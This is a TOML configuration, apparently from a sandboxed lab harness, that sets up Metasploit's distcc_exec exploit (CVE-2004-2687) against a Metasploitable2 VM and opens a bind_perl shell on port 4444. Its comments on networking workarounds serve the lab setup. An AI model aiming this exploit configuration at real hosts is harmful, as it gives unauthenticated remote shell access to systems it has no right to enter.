description = """
distccd v1 unauthenticated command execution (CVE-2004-2687). The
distcc daemon doesn't verify the source of compile jobs, so a
crafted DCC_CMD-style request runs an arbitrary command as the
distccd user. Metasploitable2 ships distccd 2.18.3 listening on
3632. Returns a low-priv shell — paired with a privesc later if
needed; for envelope work the unprivileged shell is enough.
"""

[module]
type = "exploit"
path = "unix/misc/distcc_exec"

[module.options]
RHOSTS = "{{ target_ip }}"
RPORT = 3632

[payload]
# Bind shell on a fixed in-guest port. The host hostfwds this port
# (see runtime.extra_target_ports) so msfrpcd can connect to it
# from the loopback side. Avoids the SLIRP+restrict=on dead-end the
# reverse_tcp payload hits.
path = "cmd/unix/bind_perl"
[payload.options]
LPORT = 4444

[session]
type = "shell"

[runtime]
# bind_perl opens a new guest port; fleet hostfwds it via SLIRP.
# No bridge egress needed — host connects in, not guest out.
requires_bridge = false
extra_target_ports = [4444]